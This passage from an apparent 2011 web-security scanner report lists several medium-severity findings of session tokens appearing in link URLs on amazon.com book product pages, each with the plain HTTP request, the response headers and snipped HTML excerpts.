</a> or <a href="https://secure.unicefusa.org/site/Donation2?df_id=9040&amp;9040.donation=form1&amp;JServSessionIdr004=uepo7wal02.app220b">unicefusa.org/kind</a>
...[SNIP]...

11.14. http://www.amazon.com/gp/product/0470650923

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /gp/product/0470650923

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /gp/product/0470650923 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:29:33 GMT
Server: Server
x-amz-id-1: 0FB6KRV0MVS1BJJ37AT4
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: l51TKC8bD5OicdfsGYvcPObyVpYJLR9Rx7zE2Y4nwPxVFwBYnt1W1uWwp6YohY8J
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=181-4491985-5345663; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 409295


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_fa_dp_Elkrnb0BKVMSB?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&amp;location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0470650923%2Fref%3Dcm_sw_r_fa_dp_Elkrnb0BKVMSB%26bodytext%3DProfessional%2520Silverlight%25204%2520(Wrox%2520Programmer%2520to%2520Programmer)%2520by%2520Jason%2520Beres" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_dp_Elkrnb0BKVMSB?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0470650923%2Fref%3Dcm_sw_r_fa_dp_Elkrnb0BKVMSB%26bodytext%3DProfessional%2520Silverlight%25204%2520(Wrox%2520Programmer%2520to%2520Programmer)%2520by%2520Jason%2520Beres', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: 0 -1px; height: 15px; width: 15px;">
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_dp_Elkrnb0BKVMSB?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&amp;location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0470650923%252Fref%253Dcm_sw_r_tw_dp_Elkrnb0BKVMSB%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DProfessional%2520Silverlight%25204%2520(Wrox%2520Programmer%2520to%2520Programmer)%2520by%2520Jason%2520Beres%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0470650923%2Fref%3Dcm_sw_r_tw_dp_Elkrnb0BKVMSB%26count%3Dnone" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_dp_Elkrnb0BKVMSB?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0470650923%252Fref%253Dcm_sw_r_tw_dp_Elkrnb0BKVMSB%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DProfessional%2520Silverlight%25204%2520(Wrox%2520Programmer%2520to%2520Programmer)%2520by%2520Jason%2520Beres%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0470650923%2Fref%3Dcm_sw_r_tw_dp_Elkrnb0BKVMSB%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -15px -1px; height: 15px; width: 15px;">
...[SNIP]...
<td style="font-size: 11px;"><a href="/gp/redirect.html/ref=amb_link_354882122_1/181-4491985-5345663?location=http://www.amazon.com/gp/student/signup/info&token=3A0F170E7CEFE27BDC730D3D7344512BC1296B83&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=product-alert&pf_rd_r=0FB6KRV0MVS1BJJ37AT4&pf_rd_t=201&pf_rd_p=1284419222&pf_rd_i=0470650923"><img src="http://g-ecx.images-amazon.com/images/G/01/books/student/50_amazon_student._V187616879_.gif" width="50" align="left" alt="Textbook Student" height="37" border="0" /></a>

FREE Two-Day Shipping for Students. <a href="/gp/redirect.html/ref=amb_link_354882122_3/181-4491985-5345663?location=http://www.amazon.com/gp/student/signup/info&token=3A0F170E7CEFE27BDC730D3D7344512BC1296B83&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=product-alert&pf_rd_r=0FB6KRV0MVS1BJJ37AT4&pf_rd_t=201&pf_rd_p=1284419222&pf_rd_i=0470650923">Learn more</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2NSUXLDO2I6M6/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=07E1EFC20DEA1370E94DA037D58412612D612DC4&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDQ3MDY1MDkyMy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R2NSUXLDO2I6M6.2115.Helpful.Reviews&voteSessionID=181-4491985-5345663"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2NSUXLDO2I6M6/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=3FBA86291749D688488CEA106BE335E1743120FF&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDQ3MDY1MDkyMy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R2NSUXLDO2I6M6.2115.Helpful.Reviews&voteSessionID=181-4491985-5345663"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2NSUXLDO2I6M6/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=E7D791ED7EF4FDFBB5F52DBAE04F4A9F21767750&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDQ3MDY1MDkyMy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R2NSUXLDO2I6M6.2115.Inappropriate.Reviews&voteSessionID=181-4491985-5345663"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RBKOFMQCA9K6F/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=CC4569FB0DBC1BF923E603531B628A08178FD030&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDQ3MDY1MDkyMy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=RBKOFMQCA9K6F.2115.Helpful.Reviews&voteSessionID=181-4491985-5345663"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RBKOFMQCA9K6F/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=DEBBAD29F1E4EF197B389FB5C86C202273418E26&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDQ3MDY1MDkyMy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=RBKOFMQCA9K6F.2115.Helpful.Reviews&voteSessionID=181-4491985-5345663"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RBKOFMQCA9K6F/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=6E2B0E141A950C12A1E0716EC94D5E45A04F01B6&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDQ3MDY1MDkyMy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=RBKOFMQCA9K6F.2115.Inappropriate.Reviews&voteSessionID=181-4491985-5345663"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R5IOGQXSAO3Y6/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=282E89A0EE70EE633F6F8C0F4D12DE05950BCFEB&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDQ3MDY1MDkyMy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R5IOGQXSAO3Y6.2115.Helpful.Reviews&voteSessionID=181-4491985-5345663"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R5IOGQXSAO3Y6/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=BC772305F27C460C702988070CFF7CF42E798E6D&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDQ3MDY1MDkyMy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R5IOGQXSAO3Y6.2115.Helpful.Reviews&voteSessionID=181-4491985-5345663"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R5IOGQXSAO3Y6/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=949CE8B36BE4EA4C9C2C9469C7C0601236CC2DA9&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDQ3MDY1MDkyMy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R5IOGQXSAO3Y6.2115.Inappropriate.Reviews&voteSessionID=181-4491985-5345663"
>
Report abuse</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir/181-4491985-5345663?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr/181-4491985-5345663?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html/181-4491985-5345663?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html/181-4491985-5345663?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a>
...[SNIP]...

11.15. http://www.amazon.com/gp/product/0672333368

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /gp/product/0672333368

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /gp/product/0672333368?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=0672333368 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:29:33 GMT
Server: Server
x-amz-id-1: 04VBMFPBJXZ8J962J8W2
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: fH3WLv3Jzmox2K4JTSORqyP3dG78f8/Z57/rsvJ+e57X3LhuWxe1LUoVMzwVuNdD
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=185-0119564-6236271; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=Oel7bYwRWS1gKV5RSiNZiK5lZAAokMgjRBrE5HDUyc9ir04+EELG8B5ZvPf93p6q/Wug8LCjECLDGs1NV2Ss5CncqyEhzH4Xx7dc9WlLyukc31H5gDwd1M0N2+5dFhG9r9UQX7bBDo1UvRUWe9CKYp29GbQIzzh4/e34AfsAPvBx1HVvihnL6R0of1OO3HpDP4AGMQXekYYMU4xOPcaCZk0VUxYwQP/RumeAVnei2D4rad8Xugnf2lk0nqBj3rkP6vzCnoFEzmbe3GgDLzEstwODPn9gW6oauV3yNspeqzecQNyMXmsDy/UrRjAUYndEw91zCgoaiXhnp39HquunCVQJJv/M/EGP7xhqBuRl49vBAGLgp8yRAJwJEgmd86mQGKHoS1Ku4VfxXIMdaRhhkLOtFXZRjef7VWDgVqemNz4+2YF2kiCxAGs6W/ltnCEp33kcaW9Sa6E=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:33 2011 GMT
Content-Length: 386121


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_fa_idp_Dlkrnb0VMPJZJ?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&amp;location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0672333368%2Fref%3Dcm_sw_r_fa_idp_Dlkrnb0VMPJZJ%26bodytext%3DSilverlight%25204%2520Unleashed%2520by%2520Laurent%2520Bugnion" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_idp_Dlkrnb0VMPJZJ?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0672333368%2Fref%3Dcm_sw_r_fa_idp_Dlkrnb0VMPJZJ%26bodytext%3DSilverlight%25204%2520Unleashed%2520by%2520Laurent%2520Bugnion', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: 0 -1px; height: 15px; width: 15px;">
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_idp_Dlkrnb0VMPJZJ?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&amp;location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0672333368%252Fref%253Dcm_sw_r_tw_idp_Dlkrnb0VMPJZJ%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DSilverlight%25204%2520Unleashed%2520by%2520Laurent%2520Bugnion%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0672333368%2Fref%3Dcm_sw_r_tw_idp_Dlkrnb0VMPJZJ%26count%3Dnone" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_idp_Dlkrnb0VMPJZJ?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0672333368%252Fref%253Dcm_sw_r_tw_idp_Dlkrnb0VMPJZJ%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DSilverlight%25204%2520Unleashed%2520by%2520Laurent%2520Bugnion%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0672333368%2Fref%3Dcm_sw_r_tw_idp_Dlkrnb0VMPJZJ%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -15px -1px; height: 15px; width: 15px;">
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R3BROO1V9I984R/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=9CC4FDA7A405678ED5366A2FB935E7D9CF93DECC&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDY3MjMzMzM2OC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MDY3MjMzMzM2OA&voteAnchorName=R3BROO1V9I984R.2115.Helpful.Reviews&voteSessionID=185-0119564-6236271"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R3BROO1V9I984R/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=0DC2B6271ED508733470ABA22F641A25BE550680&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDY3MjMzMzM2OC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MDY3MjMzMzM2OA&voteAnchorName=R3BROO1V9I984R.2115.Helpful.Reviews&voteSessionID=185-0119564-6236271"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R3BROO1V9I984R/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=19B93DD68EB2AACD5FF3F0E1AEE9AFA692C107CC&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDY3MjMzMzM2OC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MDY3MjMzMzM2OA&voteAnchorName=R3BROO1V9I984R.2115.Inappropriate.Reviews&voteSessionID=185-0119564-6236271"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RQBNVCBIA1AXY/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=C942A1E3444D734342B81B20F2619286001AC621&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDY3MjMzMzM2OC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MDY3MjMzMzM2OA&voteAnchorName=RQBNVCBIA1AXY.2115.Helpful.Reviews&voteSessionID=185-0119564-6236271"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RQBNVCBIA1AXY/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=010B1555D8A061B20D011F6025C060402583CB6B&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDY3MjMzMzM2OC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MDY3MjMzMzM2OA&voteAnchorName=RQBNVCBIA1AXY.2115.Helpful.Reviews&voteSessionID=185-0119564-6236271"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RQBNVCBIA1AXY/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=1734E01A885D6EED9DD3D9FA6103D15AEE210C64&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDY3MjMzMzM2OC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MDY3MjMzMzM2OA&voteAnchorName=RQBNVCBIA1AXY.2115.Inappropriate.Reviews&voteSessionID=185-0119564-6236271"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R32D724UGWFC5B/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=4BDB817971AE138F256933C59ACFA3BBF258D6CC&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDY3MjMzMzM2OC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MDY3MjMzMzM2OA&voteAnchorName=R32D724UGWFC5B.2115.Helpful.Reviews&voteSessionID=185-0119564-6236271"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R32D724UGWFC5B/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=2E112C5387CD101DB45B6C7A7C0D27FD14A9EC76&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDY3MjMzMzM2OC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MDY3MjMzMzM2OA&voteAnchorName=R32D724UGWFC5B.2115.Helpful.Reviews&voteSessionID=185-0119564-6236271"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R32D724UGWFC5B/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=13F44D8DB85E62AB513A2FC8BB0759865CE7242B&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDY3MjMzMzM2OC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MDY3MjMzMzM2OA&voteAnchorName=R32D724UGWFC5B.2115.Inappropriate.Reviews&voteSessionID=185-0119564-6236271"
>
Report abuse</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir/185-0119564-6236271?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr/185-0119564-6236271?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html/185-0119564-6236271?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html/185-0119564-6236271?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a>
...[SNIP]...

11.16. http://www.amazon.com/gp/product/0981511821

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /gp/product/0981511821

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /gp/product/0981511821 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:30:30 GMT
Server: Server
x-amz-id-1: 0XB1D4PZ9419ZYHZPFK1
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: paCmRy1sJia9Yo22kUbZJqup3sUmP5UPhjF9KZKfoPPtyZa2vqwpTeDVQZrYvCgc
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=177-1907126-9874658; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 325743


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_fa_idp_xmkrnb0BDP91Z?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&amp;location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0981511821%2Fref%3Dcm_sw_r_fa_idp_xmkrnb0BDP91Z%26bodytext%3DSilverlight%25204%2520Jumpstart%2520by%2520David%2520Yack" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_idp_xmkrnb0BDP91Z?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0981511821%2Fref%3Dcm_sw_r_fa_idp_xmkrnb0BDP91Z%26bodytext%3DSilverlight%25204%2520Jumpstart%2520by%2520David%2520Yack', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: 0 -1px; height: 15px; width: 15px;">
...[SNIP]...
